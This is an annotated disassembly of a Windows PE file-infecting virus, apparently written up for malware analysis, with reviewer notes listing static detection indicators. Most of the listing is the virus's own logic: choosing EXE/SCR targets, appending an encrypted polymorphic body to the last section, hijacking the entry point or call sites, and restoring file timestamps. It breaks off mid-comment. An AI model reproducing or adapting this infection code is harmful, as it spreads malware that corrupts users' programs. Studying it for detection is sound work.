loc_3150CD0F: ; CODE XREF: UPX2:3150CD00j
              ; UPX2:3150CD08j
    mov eax, edi
    mov ecx, [ebp+403982h]
    sub eax, ecx
    mov [ecx-4], eax                        ; back-patch the zero displacement stored earlier
    mov al, 58h
    or al, [ebp+403429h]
    stosb
    test dword ptr [ebp+403431h], 400000h
    jz short loc_3150CD3D
    mov ax, 0C350h
    or al, [ebp+403429h]
    jmp short loc_3150CD47
; ---------------------------------------------------------------------------
loc_3150CD3D: ; CODE XREF: UPX2:3150CD2Fj
    mov ax, 0E0FFh
    or ah, [ebp+403429h]
loc_3150CD47: ; CODE XREF: UPX2:3150CD3Bj
    stosw
loc_3150CD49: ; CODE XREF: UPX2:3150CCF4j
    test dword ptr [ebp+403431h], 1000003h
    jz short loc_3150CDC8
    test dword ptr [ebp+403431h], 20000000h
    jz short loc_3150CD6E
loc_3150CD61: ; CODE XREF: UPX2:3150CD6Cj
    test edi, 3
    jz short loc_3150CD6E
    mov al, 90h
    stosb
    jmp short loc_3150CD61
; ---------------------------------------------------------------------------
loc_3150CD6E: ; CODE XREF: UPX2:3150CD5Fj
              ; UPX2:3150CD67j
    mov ecx, edi
    mov eax, [ebp+40399Ah]
    sub ecx, eax
    mov [eax-4], ecx
    xor ecx, ecx
    test dword ptr [ebp+403431h], 800000h
    jnz short loc_3150CD97
    lea eax, [ebp+403429h]
loc_3150CD8F: ; CODE XREF: UPX2:3150CD95j
    mov cl, [eax]                           ; first table byte below 3
    inc eax
    cmp cl, 3
    jnb short loc_3150CD8F
loc_3150CD97: ; CODE XREF: UPX2:3150CD87j
    lea eax, ds:102444h[ecx*8]
    shl eax, 8
    mov al, 8Bh
    stosd
    jecxz short loc_3150CDAC
    mov ax, 0C031h
    stosw
loc_3150CDAC: ; CODE XREF: UPX2:3150CDA4j
    mov ax, 808Fh
    push 0B8h
    add ah, cl
    stosw
    pop eax
    stosd
    test ecx, ecx
    jnz short loc_3150CDC5
    mov ax, 0C031h
    stosw
loc_3150CDC5: ; CODE XREF: UPX2:3150CDBDj
    mov al, 0C3h                            ; 0C3h = ret
    stosb
loc_3150CDC8: ; CODE XREF: UPX2:3150CD53j
    lea eax, [ebp+40343Ch]
    test dword ptr [ebp+403431h], 10000000h
    jnz short loc_3150CDE0
    push edi
    sub edi, eax                            ; edi = number of bytes emitted
    pop eax
    jmp short loc_3150CDF9
; ---------------------------------------------------------------------------
loc_3150CDE0: ; CODE XREF: UPX2:3150CDD8j
    mov edx, [ebx+28h]                      ; +28h from the NT headers is AddressOfEntryPoint
    sub edi, eax
    sub edx, eax
    mov ecx, [ebp+4039A2h]
    add [ebp+403982h], edx
    add [ecx], edi                          ; emitted length added to the stored 243Ch
    mov eax, [esp+4]
loc_3150CDF9: ; CODE XREF: UPX2:3150CDDEj
    mov [ebp+40106Dh], edi                  ; emitted length, used by sub_3150D125 / sub_3150D249
    mov edi, [ebp+403986h]
    sub eax, [ebp+403982h]
    test dword ptr [ebp+403431h], 40h
    jz short loc_3150CE19
    neg eax
loc_3150CE19: ; CODE XREF: UPX2:3150CE15j
    stosd                                   ; fill the operand slot saved in [ebp+403986h]
    retn 4

; =============== S U B R O U T I N E =======================================
; sub_3150CE1D (called from sub_3150D249 when bit 80000000h of [ebp+403431h]
; is set): scans the mapped file's code, starting at the entry point
; ([ebx+28h]), for `0E8h rel32` and `0FFh 15h [mem]` call encodings and checks
; where each one leads (a `0FFh 25h` jump stub, or an address held in the
; section that contains [ebx+80h]). The first accepted call site is rewritten
; at loc_3150D014.
; In:  ebx = NT headers, [ebp+403972h] = mapping base, [ebp+4039AEh] != 0,
;      the caller's edi (pushed here, re-read at loc_3150D005 / loc_3150D014).
; NOTE(review): two disassembler desynchronisations follow.
;  * The one-byte opcodes after `call near ptr loc_3150CE3D+1`
;    (4Bh 45h 52h 4Eh 45h 4Ch 33h 32h 2Eh 44h 4Ch 4Ch) spell the ASCII string
;    "KERNEL32.DLL": the call jumps over inline data and leaves the string's
;    address on the stack.
;  * The statements between `endp` and `mov ebx, [eax+3Ch]` are presumably an
;    indirect call taking that string, a store to [ebp+4039BEh] (read before
;    the call through [ebp+403548h] further down) and `push ebx`; confirm
;    against the raw bytes.
sub_3150CE1D proc near ; CODE XREF: sub_3150D249+2A8p
    push esi
    push edi
    cmp dword ptr [ebp+4039AEh], 0
    jz loc_3150D005
    call near ptr loc_3150CE3D+1
    dec ebx
    inc ebp
    push edx
    dec esi
    inc ebp
    dec esp
    xor esi, [edx]
    db 2Eh
    inc esp
    dec esp
    dec esp
loc_3150CE3D: ; CODE XREF: sub_3150CE1D+Fp
    add bh, bh
sub_3150CE1D endp ; sp-analysis failed

    xchg eax, ebp
    mov ds:85890040h, dh
    mov esi, 53004039h
    mov ebx, [eax+3Ch]                      ; eax = a module base; ebx = its NT headers
    add ebx, eax
    push dword ptr [ebx+28h]
    mov eax, [ebx+34h]
    call sub_3150C557
    mov edx, [ebp+4039A6h]
    pop ebx
    add eax, [edx+0Ch]
    mov [ebp+4039C2h], eax                  ; lower bound ...
    add eax, [edx+8]
    mov [ebp+4039C6h], eax                  ; ... and upper bound of an address range in that module
    mov esi, [ebx+28h]
    push dword ptr [ebx+80h]
    call sub_3150C557
    mov edi, [ebp+4039A6h]                  ; edi = section holding [ebx+80h]
    push esi
    call sub_3150C557
    mov edx, [ebp+4039A6h]                  ; edx = section holding the entry point
    mov ecx, [edx+8]
    add ecx, [edx+0Ch]
    sub ecx, esi
    sub ecx, 5                              ; bytes to scan, minus one 5-byte call
    js loc_3150D005
    jz loc_3150D005
    add esi, [ebp+4039AAh]
    add esi, [ebp+403972h]                  ; esi = entry point inside the mapping
; START OF FUNCTION CHUNK FOR sub_3150CFD6
loc_3150CEB7: ; CODE XREF: sub_3150CFD6+29j
    lodsb
    cmp al, 0E8h                            ; call rel32
    jnz loc_3150CF62
    lea eax, [esi+4]
    sub eax, [ebp+403972h]
    add eax, [esi]                          ; offset just past the call + its displacement
    push eax
    call sub_3150C557
    cmp dword ptr [ebp+4039A6h], 0
    jnz short loc_3150CEE5
    cmp eax, [edi+0Ch]
    jnb loc_3150CFFE
    jmp short loc_3150CEF1
; ---------------------------------------------------------------------------
loc_3150CEE5: ; CODE XREF: sub_3150CFD6-FEj
    cmp [ebp+4039A6h], edx
    jnz loc_3150CFFE                        ; target must be in the entry-point section
loc_3150CEF1: ; CODE XREF: sub_3150CFD6-F3j
    add eax, [ebp+403972h]
    cmp word ptr [eax], 25FFh               ; target is a `jmp dword ptr [imm32]` stub
    jnz loc_3150CFFE
    mov eax, [eax+2]
    sub eax, [ebx+34h]
    push eax
    call sub_3150C557
    cmp [ebp+4039A6h], edi
    jnz loc_3150CFFE
    add eax, [ebp+4039AAh]
    add eax, [ebp+403972h]
    mov eax, [eax]
    sub eax, [edi+0Ch]
    jb loc_3150CFFE
    cmp eax, [edi+8]
    jnb loc_3150CFFE
loc_3150CF3A: ; CODE XREF: sub_3150CFD6+22j
    add eax, 2
    add eax, [edi+14h]
    add eax, [ebp+403972h]                  ; eax = name string inside the mapping
    push edx
    push eax
    push dword ptr [ebp+4039BEh]
    call dword ptr [ebp+403548h]            ; two-argument API (handle, name) - presumably a name lookup
    pop edx
    test eax, eax
    jnz loc_3150D014
    jmp loc_3150CFFE
; ---------------------------------------------------------------------------
loc_3150CF62: ; CODE XREF: sub_3150CFD6-11Cj
    cmp al, 0FFh
    jnz loc_3150CFFE
    cmp byte ptr [esi], 15h                 ; FFh 15h = call dword ptr [imm32]
    jnz loc_3150CFFE
    mov eax, [esi+1]
    sub eax, [ebx+34h]
    push eax
    call sub_3150C557
    cmp [ebp+4039A6h], edi
    jnz short loc_3150CFFE
    add eax, [ebp+4039AAh]
    add eax, [ebp+403972h]
    mov [ebp+4039CAh], eax                  ; address of the referenced slot in the mapping
    mov eax, [eax]
    cmp eax, [ebp+4039C2h]
    jb short loc_3150CFAB
    cmp eax, [ebp+4039C6h]
    jb short loc_3150D014                   ; slot value lies inside the saved range
loc_3150CFAB: ; CODE XREF: sub_3150CFD6-35j
    cmp eax, 70000000h
    jb short loc_3150CFE9
    call sub_3150CFD6                       ; walker callback resumes at the next statement
    lea ecx, [esi-4]
    mov eax, ecx
    sub eax, [edx]
    add eax, [edx+10h]
    cmp eax, [ebp+4039CAh]
    jnz short locret_3150CFD5               ; not the slot being looked for
    add esp, 10h
    push dword ptr [ecx]
    pop [esp-0Ch+arg_24]
    popa
    jmp short loc_3150CFF0
; ---------------------------------------------------------------------------
locret_3150CFD5: ; CODE XREF: sub_3150CFD6-Fj
    retn
; END OF FUNCTION CHUNK FOR sub_3150CFD6

; =============== S U B R O U T I N E =======================================
; sub_3150CFD6: pops its return address into [ebp+403992h] (the callback slot
; used by sub_3150C65E) and runs the walker over the mapping with all
; registers saved.
sub_3150CFD6 proc near ; CODE XREF: sub_3150CFD6-24p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 3150CEB7 SIZE 0000011F BYTES
    pop dword ptr [ebp+403992h]
    pusha
    mov esi, [ebp+403972h]
    call sub_3150C65E
    popa
loc_3150CFE9: ; CODE XREF: sub_3150CFD6-26j
    test eax, 80000000h
    jnz short loc_3150CFFE
loc_3150CFF0: ; CODE XREF: sub_3150CFD6-3j
    sub eax, [edi+0Ch]
    jb short loc_3150CFFE
    cmp eax, [edi+8]
    jb loc_3150CF3A
loc_3150CFFE: ; CODE XREF: sub_3150CFD6-F9j
              ; sub_3150CFD6-EBj ...
    dec ecx
    jnz loc_3150CEB7
loc_3150D005: ; CODE XREF: sub_3150CE1D+9j
              ; UPX2:3150CE9Fj ...
; NOTE(review): collapsed listing restored to one statement per line; instruction
; text is unchanged. The first statements are the two exits of the call-site
; scan (sub_3150CE1D / sub_3150CFD6): loc_3150D005 is reached when no call
; site was accepted, loc_3150D014 when one was.
    mov edi, [esp-4+arg_0]                  ; edi value pushed on entry to the scan
    and dword ptr [edi+2431h], 7FFFFFFFh    ; clear the top bit of the dword at +2431h
    jmp short loc_3150D050
; ---------------------------------------------------------------------------
loc_3150D014: ; CODE XREF: sub_3150CFD6-7Fj
              ; sub_3150CFD6-2Dj
    ; Rewrites the accepted call site inside the mapped file: six original
    ; bytes are copied to [ecx+2435h], then the site becomes 0E8h + rel32.
    ; The section is also marked 0E0000060h (code | initialised data |
    ; execute | read | write) - a writable+executable code section is a
    ; useful static indicator.
    or dword ptr [edx+24h], 0E0000060h
    dec esi                                 ; back to the opcode byte consumed by lodsb
    xor eax, eax
    mov ecx, [esp+8+var_8]
    xchg eax, [ebp+4039AEh]                 ; take the value and zero the variable
    lea edi, [ecx+2435h]
    add eax, [ebp+403972h]
    movsw
    movsd
    dec esi
    sub eax, esi
    add eax, [edx+14h]
    sub eax, [edx+0Ch]
    mov byte ptr [esi-5], 0E8h
    mov dword ptr [ecx+52h], 5
    mov [esi-4], eax
loc_3150D050: ; CODE XREF: sub_3150CFD6+3Cj
    pop edi
    pop esi
    retn
sub_3150CFD6 endp ; sp-analysis failed

; =============== S U B R O U T I N E =======================================
; sub_3150D053: opens the file named at [ebp+40384Eh] and maps it.
; In:  ebx = number of bytes added to the file size for the mapping
;      (0 at the first visible call site, [ebp+403976h] at the second).
; Out: [ebp+403952h] result of the first call, [ebp+403956h] file handle,
;      [ebp+40395Ah] / [ebp+403962h] two output buffers of the fourth call,
;      [ebp+40396Ah] file size, [ebp+40396Eh] mapping handle,
;      [ebp+403972h] view base. Callers test ZF right after the call.
; The targets are indirect pointers that are not named in this listing; the
; argument patterns are consistent with GetFileAttributes, SetFileAttributes
; (attributes = 0), CreateFile (GENERIC_READ|GENERIC_WRITE, share 1,
; OPEN_EXISTING), GetFileTime, GetFileSize, CreateFileMapping
; (PAGE_READWRITE) and MapViewOfFile (0F001Fh) - TODO confirm against the
; resolved pointer table. Failure paths jump into the clean-up labels of
; sub_3150D58F.
sub_3150D053 proc near ; CODE XREF: UPX2:3150D221p
                       ; sub_3150D249+127p
    lea esi, [ebp+40384Eh]
    push esi
    call dword ptr [ebp+40357Ch]
    cmp eax, 0FFFFFFFFh
    jz locret_3150D124
    mov [ebp+403952h], eax                  ; saved; passed back in sub_3150D58F
    push 0
    push esi
    call dword ptr [ebp+4035B4h]
    test eax, eax
    jz locret_3150D124
    sub eax, eax
    push eax
    push eax
    push 3
    push eax
    push 1
    push 0C0000000h
    push esi
    call dword ptr [ebp+40355Ch]
    cmp eax, 0FFFFFFFFh
    jz loc_3150D5DC
    mov [ebp+403956h], eax
    lea ecx, [ebp+40395Ah]
    lea edx, [ebp+403962h]
    push ecx
    push edx
    push 0
    push eax
    call dword ptr [ebp+403584h]
    cmp eax, 0FFFFFFFFh
    jz loc_3150D5D0
    push 0
    push dword ptr [ebp+403956h]
    call dword ptr [ebp+403580h]
    cmp eax, 0FFFFFFFFh
    jz loc_3150D5D0
    mov [ebp+40396Ah], eax
    xor ecx, ecx
    add eax, ebx                            ; mapping size = file size + ebx
    push ecx
    push eax
    push ecx
    push 4
    push ecx
    push dword ptr [ebp+403956h]
    call dword ptr [ebp+403560h]
    test eax, eax
    jz loc_3150D5D0
    xor ecx, ecx
    mov [ebp+40396Eh], eax
    push ecx
    push ecx
    push ecx
    push 0F001Fh
    push eax
    call dword ptr [ebp+4035A0h]
    test eax, eax
    jz loc_3150D5A8
    mov [ebp+403972h], eax
locret_3150D124: ; CODE XREF: sub_3150D053+10j
                 ; sub_3150D053+27j ...
; NOTE(review): collapsed listing restored to one statement per line; instruction
; text is unchanged. The first statement is the shared `retn` at
; locret_3150D124 that closes sub_3150D053.
    retn
sub_3150D053 endp

; =============== S U B R O U T I N E =======================================
; sub_3150D125: computes two rounded sizes.
; In:  ebx = NT headers ([ebx+38h] SectionAlignment, [ebx+3Ch] FileAlignment),
;      [ebp+40106Dh] = length written by the emitter at loc_3150C7EF.
; Out: [ebp+40397Ah] = 69CDh (+ [ebp+40106Dh] unless bit 10000000h of
;                      [ebp+403431h] is set), rounded with [ebx+38h];
;      [ebp+403976h] = 243Bh + [ebp+40106Dh], rounded with [ebx+3Ch].
; The rounding is ((x + a) / a) * a, so an exact multiple still grows by a.
; Neither divisor is checked for zero.
sub_3150D125 proc near ; CODE XREF: sub_3150D249+117p
                       ; sub_3150D249+223p
    mov eax, 69CDh
    mov ecx, [ebx+38h]
    test dword ptr [ebp+403431h], 10000000h
    jnz short loc_3150D13F
    add eax, [ebp+40106Dh]
loc_3150D13F: ; CODE XREF: sub_3150D125+12j
    xor edx, edx
    add eax, ecx
    div ecx
    mul ecx
    mov [ebp+40397Ah], eax
    mov eax, 243Bh
    mov ecx, [ebx+3Ch]
    add eax, [ebp+40106Dh]
    xor edx, edx
    add eax, ecx
    div ecx
    mul ecx
    mov [ebp+403976h], eax
    retn
sub_3150D125 endp

; =============== S U B R O U T I N E =======================================
; sub_3150D16A: selects the last section header that has a non-zero
; VirtualAddress.
; In:  ebx = NT headers, [ebp+40396Ah] = file size.
; Out: edx = section header; CF = 1 means "reject" (callers use `jb`):
;      - no usable section, or
;      - the first four name bytes equal 6E69775Fh (ASCII "_win"), or
;      - the section's raw end, rounded with [ebx+3Ch], is below the file
;        size (data follows the last section).
sub_3150D16A proc near ; CODE XREF: sub_3150D249:loc_3150D298p
                       ; sub_3150D249+13Dp
    movzx ecx, word ptr [ebx+6]
    stc
loc_3150D16F: ; CODE XREF: sub_3150D16A+23j
    jecxz short locret_3150D1A6             ; out of sections: return with CF set
    lea edx, [ebx+18h]
    movzx eax, word ptr [ebx+14h]
    add edx, eax
    dec ecx
    imul eax, ecx, 28h
    add edx, eax                            ; edx = header of section index ecx
    cmp dword ptr [edx], 6E69775Fh          ; "_win"
    stc
    jz short locret_3150D1A6
    cmp dword ptr [edx+0Ch], 1
    jb short loc_3150D16F                   ; VirtualAddress == 0: try the previous one
    mov ecx, [ebx+3Ch]
    mov eax, [edx+14h]
    add eax, [edx+10h]
    lea eax, [eax+ecx*2-1]
    neg ecx
    and eax, ecx
    cmp eax, [ebp+40396Ah]                  ; CF = rounded end < file size
locret_3150D1A6: ; CODE XREF: sub_3150D16A:loc_3150D16Fj
                 ; sub_3150D16A+1Dj ...
; NOTE(review): collapsed listing restored to one statement per line; instruction
; text is unchanged. The first statement is the shared `retn` at
; locret_3150D1A6 that closes sub_3150D16A.
    retn
sub_3150D16A endp

; =============== S U B R O U T I N E =======================================
; sub_3150D1A7: pops its own return address into offset 0B8h of the structure
; whose pointer is at [esp+10h] and returns eax = 0.
; NOTE(review): called right after sub_3150D249, whose return address is used
; as the second dword of the frame linked at fs:[0]; offset 0B8h matches Eip
; in the 32-bit Windows CONTEXT record, so this looks like an exception
; handler that resumes execution after itself - TODO confirm.
sub_3150D1A7 proc near ; CODE XREF: UPX2:3150D233p
arg_C = dword ptr 10h
    mov edx, [esp+arg_C]
    xor eax, eax
    pop dword ptr [edx+0B8h]
    retn
sub_3150D1A7 endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; Path filter (the entry is the unlabelled `lea edi, [ebp+40384Eh]` below).
; Copies the string at esi to [ebp+40384Eh], upper-casing a-z, while tracking
; ebx = character after the last '\' and ecx = character after the last '.'.
; Processing continues only when the extension is "EXE" or "SCR" and the
; file name does not start with "WINC", "WCUN", "WC32" or "PSTO".
loc_3150D1B4: ; CODE XREF: UPX2:3150D1D5j
    mov ecx, edi                            ; just stored '.': ecx -> extension
    jmp short loc_3150D1C3
; ---------------------------------------------------------------------------
    lea edi, [ebp+40384Eh]
    cld
loc_3150D1BF: ; CODE XREF: UPX2:3150D1D1j
    mov ebx, edi                            ; start, or just stored '\': ebx -> file name
    xor ecx, ecx
loc_3150D1C3: ; CODE XREF: UPX2:3150D1B6j
              ; UPX2:3150D1D9j
    lodsb
    cmp al, 61h
    jb short loc_3150D1CE
    cmp al, 7Ah
    ja short loc_3150D1CE
    sub al, 20h
loc_3150D1CE: ; CODE XREF: UPX2:3150D1C6j
              ; UPX2:3150D1CAj
    stosb
    cmp al, 5Ch
    jz short loc_3150D1BF
    cmp al, 2Eh
    jz short loc_3150D1B4
    cmp al, 0
    jnz short loc_3150D1C3
    jecxz short locret_3150D1A6             ; no extension
    mov eax, [ecx]
    cmp eax, 455845h                        ; "EXE",0
    jz short loc_3150D1F1
    cmp eax, 524353h                        ; "SCR",0
    jnz locret_3150D124
loc_3150D1F1: ; CODE XREF: UPX2:3150D1E4j
    mov eax, [ebx]
    cmp eax, 434E4957h                      ; "WINC"
    jz locret_3150D124
    cmp eax, 4E554357h                      ; "WCUN"
    jz locret_3150D124
    cmp eax, 32334357h                      ; "WC32"
    jz locret_3150D124
    cmp eax, 4F545350h                      ; "PSTO"
    jz locret_3150D124
    xor ebx, ebx
    call sub_3150D053                       ; open + map with no extra size
    jz locret_3150D124
    xor edx, edx
    call sub_3150D249
    call sub_3150D1A7
    call $+5
    pop ebp
    sub ebp, 402F8Ah                        ; recompute the position-independent base in ebp
    jmp loc_3150D586

; =============== S U B R O U T I N E =======================================
; sub_3150D249: validates the mapped file and rewrites it.
; In:  edx = 0, [ebp+403972h] = mapping base, ebp = data base.
; Steps visible in this listing:
;  1. links a frame at fs:[0] (prev pointer pushed here, the caller's return
;     address above it);
;  2. requires "MZ" / "PE", rejects images with Characteristics bit 2000h
;     (DLL) and those without bit 2 in the Subsystem byte; the dword at file
;     offset 20h must be 0 or above 101h (it is overwritten later from
;     [ebp+40397Eh], so it presumably marks files already processed);
;  3. sub_3150D16A picks the last section;
;  4. sub_3150BDA2 (defined outside this excerpt, presumably random) perturbs
;     [ebp+40342Fh], [ebp+403430h] and every bit of [ebp+403431h], and
;     shuffles the six bytes at [ebp+403429h];
;  5. emits the stub (loc_3150C7EF), sizes the growth (sub_3150D125), unmaps
;     (sub_3150D58F) and re-maps the file enlarged by [ebp+403976h];
;  6. ORs 0E0000060h into the section flags, copies the stub and 90Fh dwords
;     from [ebp+401000h] to the end of the last section, and adjusts
;     AddressOfEntryPoint ([ebx+28h]), VirtualSize, SizeOfRawData, SizeOfImage
;     ([ebx+50h]) and clears CheckSum ([ebx+58h]);
;  7. transforms the copied bytes with a rolling byte key (add or xor).
; Static indicators that follow from the above: last section flagged
; read+write+execute, entry point inside or redirected to the last section,
; zero CheckSum, non-zero dword at DOS-header offset 20h.
sub_3150D249 proc near ; CODE XREF: UPX2:3150D22Ep
var_14 = dword ptr -14h
    push dword ptr fs:[edx]
    mov esi, [ebp+403972h]
    mov fs:[edx], esp
    cmp word ptr [esi], 5A4Dh               ; "MZ"
    jnz loc_3150D586
    mov ebx, [esi+3Ch]
    add ebx, esi
    cmp word ptr [ebx], 4550h               ; "PE"
    jnz loc_3150D586
    test dword ptr [ebx+16h], 2000h
    jnz loc_3150D586
    test byte ptr [ebx+5Ch], 2
    mov ecx, [esi+20h]
    jz loc_3150D586
    jecxz short loc_3150D298
    cmp ecx, 101h
    jbe loc_3150D586
loc_3150D298: ; CODE XREF: sub_3150D249+41j
    call sub_3150D16A
    jb loc_3150D586
    mov ecx, [edx+10h]
    add ecx, [edx+0Ch]
    mov eax, 10000h
    push ecx
    call sub_3150BDA2
    xor [ebp+40342Fh], dl
    mov cl, 20h
    xor [ebp+403430h], dh
loc_3150D2C2: ; CODE XREF: sub_3150D249+92j
    push 20h
    dec cl
    pop eax
    js short loc_3150D2DD
    call sub_3150BDA2
    test edx, edx
    setz dl
    shl edx, cl
    xor [ebp+403431h], edx                  ; flip bit cl when the helper returned 0
    jmp short loc_3150D2C2
; ---------------------------------------------------------------------------
loc_3150D2DD: ; CODE XREF: sub_3150D249+7Ej
              ; sub_3150D249+CDj ...
    push 6
    pop ecx
loc_3150D2E3: ; CODE XREF: sub_3150D249+B8j
    push 6
    pop eax
    call sub_3150BDA2
    mov al, [ebp+403429h]
    xchg al, [edx+ebp+403429h]              ; swap slot 0 with slot edx
    mov [ebp+403429h], al
    loop loc_3150D2E3
    ; reshuffle until the values fit the options chosen in [ebp+403431h]
    test dword ptr [ebp+403431h], 8
    jnz short loc_3150D318
    cmp byte ptr [ebp+40342Bh], 1
    jz short loc_3150D2DD
loc_3150D318: ; CODE XREF: sub_3150D249+C4j
    test dword ptr [ebp+403431h], 1000003h
    jz short loc_3150D33F
    cmp byte ptr [ebp+403429h], 5
    jz short loc_3150D2DD
    cmp byte ptr [ebp+40342Ah], 5
    jz short loc_3150D2DD
    cmp byte ptr [ebp+40342Bh], 5
    jz short loc_3150D2DD
loc_3150D33F: ; CODE XREF: sub_3150D249+D9j
    test dword ptr [ebp+403431h], 80000000h
    jz short loc_3150D354
    cmp byte ptr [ebp+403429h], 2
    ja short loc_3150D2DD
loc_3150D354: ; CODE XREF: sub_3150D249+100j
    and dword ptr [ebp+4039AEh], 0
    call loc_3150C7EF
    call sub_3150D125
    call sub_3150D58F                       ; close the current mapping
    mov ebx, [ebp+403976h]
    call sub_3150D053                       ; re-map, enlarged by ebx
    jz loc_3150D586
    mov esi, [ebp+403972h]
    mov ebx, [esi+3Ch]
    add ebx, esi
    call sub_3150D16A
    jb loc_3150D586
    or dword ptr [edx+24h], 0E0000060h
    mov edi, esi
    push edx
    push esi
    add edi, [edx+14h]
    add edi, [edx+10h]                      ; edi = end of the section's raw data
    test dword ptr [ebp+403431h], 10000000h
    jnz short loc_3150D3BC
    lea esi, [ebp+40343Ch]
    mov ecx, [ebp+40106Dh]
    rep movsb                               ; copy the emitted stub
loc_3150D3BC: ; CODE XREF: sub_3150D249+163j
    push edi
    mov ecx, 90Fh
    lea esi, [ebp+401000h]
    rep movsd                               ; copy 90Fh dwords starting at [ebp+401000h]
    mov cl, 0
    jecxz short loc_3150D3D0
    rep movsb
loc_3150D3D0: ; CODE XREF: sub_3150D249+183j
    test dword ptr [ebp+403431h], 10000000h
    jz loc_3150D488
    push dword ptr [ebx+28h]
    call sub_3150C557
    mov edx, [ebp+4039A6h]                  ; section containing the entry point
    test edx, edx
    jz loc_3150D488
    mov esi, [ebp+403972h]
    mov ecx, [edx+10h]
    or dword ptr [edx+24h], 0E0000060h
    sub ecx, [edx+8]                        ; raw size - virtual size = slack in that section
    jnb short loc_3150D40D
    xor ecx, ecx
loc_3150D40D: ; CODE XREF: sub_3150D249+1C0j
    add esi, [edx+14h]
    cmp ecx, [ebp+40106Dh]
    mov ecx, [ebp+40106Dh]
    jb short loc_3150D474                   ; slack too small for the stub
    mov edi, [esp+14h+var_14]
    and dword ptr [ebp+40106Dh], 0
    and dword ptr [edi+6Dh], 0
    mov edi, [edx+8]
    add [edx+8], ecx
    add esi, edi
    xchg esi, edi
    mov eax, [ebp+403986h]
    test dword ptr [ebp+403431h], 40h
    jz short loc_3150D44D
    neg dword ptr [eax]
loc_3150D44D: ; CODE XREF: sub_3150D249+200j
    add esi, [edx+0Ch]
    sub [eax], esi
    mov [ebp+4039AEh], esi
    mov esi, [ebx+28h]
    add [eax], esi
    test dword ptr [ebp+403431h], 40h
    jz short loc_3150D46B
    neg dword ptr [eax]
loc_3150D46B: ; CODE XREF: sub_3150D249+21Ej
    push ecx
    call sub_3150D125
    pop ecx
    jmp short loc_3150D480
; ---------------------------------------------------------------------------
loc_3150D474: ; CODE XREF: sub_3150D249+1D3j
    add esi, [ebx+28h]
    sub esi, [edx+0Ch]
    push ecx
    push esi
    rep movsb                               ; save the bytes at the entry point
    pop edi
    pop ecx
loc_3150D480: ; CODE XREF: sub_3150D249+229j
    lea esi, [ebp+40343Ch]
    rep movsb                               ; write the stub there
loc_3150D488: ; CODE XREF: sub_3150D249+191j
              ; sub_3150D249+1A7j
    pop edi
    pop esi
    rdtsc
    xchg eax, edx
    lea eax, [edi+1D2h]
    cmp dl, [ebp+40342Fh]
    jnz short loc_3150D4A1
    imul edx, 12345678h
loc_3150D4A1: ; CODE XREF: sub_3150D249+250j
    mov [eax-1], dl                         ; one timestamp-derived byte at copy offset 1D1h
    call sub_3150B475                       ; defined outside this excerpt
    pop edx
    mov ecx, [edx+0Ch]
    add ecx, [edx+10h]
    test dword ptr [ebp+403431h], 10000000h
    lea eax, [ecx+6]
    jnz short loc_3150D4D2
    mov [ebp+4039AEh], ecx
    add eax, [ebp+40106Dh]
    and dword ptr [edi+6Dh], 0
loc_3150D4D2: ; CODE XREF: sub_3150D249+274j
    sub eax, [ebx+28h]
    push dword ptr [ebp+40397Eh]
    mov [edi+52h], eax
    pop dword ptr [esi+20h]                 ; dword at file offset 20h (tested on entry)
    test dword ptr [ebp+403431h], 80000000h
    jz short loc_3150D4F7
    push edx
    call sub_3150CE1D
    pop edx
loc_3150D4F7: ; CODE XREF: sub_3150D249+2A5j
    mov ecx, [ebp+4039AEh]
    jecxz short loc_3150D502
    mov [ebx+28h], ecx                      ; new AddressOfEntryPoint
loc_3150D502: ; CODE XREF: sub_3150D249+2B4j
    mov ecx, [edx+10h]
    mov eax, [ebp+403976h]
    cmp [edx+8], ecx
    jnb short loc_3150D513
    mov [edx+8], ecx
loc_3150D513: ; CODE XREF: sub_3150D249+2C5j
    add [edx+10h], eax
    and dword ptr [ebx+58h], 0
    mov eax, [ebp+40397Ah]
    push 243Ch
    add [edx+8], eax
    pop ecx                                 ; ecx = 243Ch bytes to transform
    add [ebx+50h], eax
    mov dl, [ebp+40342Fh]                   ; dl = initial key byte
    test dword ptr [ebp+403431h], 10000000h
    jz short loc_3150D544
    add ecx, [ebp+40106Dh]
loc_3150D544: ; CODE XREF: sub_3150D249+2F3j
    mov dh, 0                               ; dh = key step: 0, 1 or [ebp+403430h]
    test dword ptr [ebp+403431h], 20000h
    jnz short loc_3150D566
    inc dh
    test dword ptr [ebp+403431h], 40000h
    jnz short loc_3150D566
    mov dh, [ebp+403430h]
loc_3150D566: ; CODE XREF: sub_3150D249+307j
              ; sub_3150D249+315j
    test dword ptr [ebp+403431h], 4000h
    jnz short loc_3150D57D
loc_3150D572: ; CODE XREF: sub_3150D249+330j
    mov al, [edi]
    add al, dl
    stosb
    add dl, dh
    loop loc_3150D572
    jmp short loc_3150D586
; ---------------------------------------------------------------------------
loc_3150D57D: ; CODE XREF: sub_3150D249+327j
              ; sub_3150D249+33Bj
    mov al, [edi]
    xor al, dl
    stosb
    add dl, dh
    loop loc_3150D57D
loc_3150D586: ; CODE XREF: UPX2:3150D244j
              ; sub_3150D249+11j ...
    ; common exit: unlink the fs:[0] frame, then fall through into the
    ; clean-up routine that follows
    xor edx, edx
    mov esp, fs:[edx]
    pop dword ptr fs:[edx]
    pop eax
sub_3150D249 endp ; sp-analysis failed

; =============== S U B R O U T I N E =======================================
; sub_3150D58F: releases what sub_3150D053 acquired; its inner labels are
; also the failure exits of sub_3150D053. The indirect targets are not named
; in this listing; by argument they are presumably UnmapViewOfFile
; ([ebp+4035C4h]), CloseHandle ([ebp+40353Ch]) and SetFileTime
; ([ebp+4035B8h], passing the two buffers filled in sub_3150D053) -
; TODO confirm. Writing those buffers back would leave the file's timestamps
; as they were before modification, so timestamps alone are not a reliable
; change indicator for this sample.
sub_3150D58F proc near ; CODE XREF: sub_3150D249+11Cp
    cmp dword ptr [ebp+403956h], 0
    jz locret_3150D124                      ; nothing open
    push dword ptr [ebp+403972h]
    call dword ptr [ebp+4035C4h]
loc_3150D5A8: ; CODE XREF: sub_3150D053+C5j
    push dword ptr [ebp+40396Eh]
    call dword ptr [ebp+40353Ch]
    lea ecx, [ebp+40395Ah]
    lea edx, [ebp+403962h]
    push ecx
    push edx
    push 0
    push dword ptr [ebp+403956h]
    call dword ptr [ebp+4035B8h]
loc_3150D5D0: ; CODE XREF: sub_3150D053+6Bj
              ; sub_3150D053+82j ...
; NOTE(review): collapsed listing restored to one statement per line; statement
; text is unchanged. The first statements finish sub_3150D58F: close the file
; handle, then call [ebp+4035B4h] with the path and the value saved in
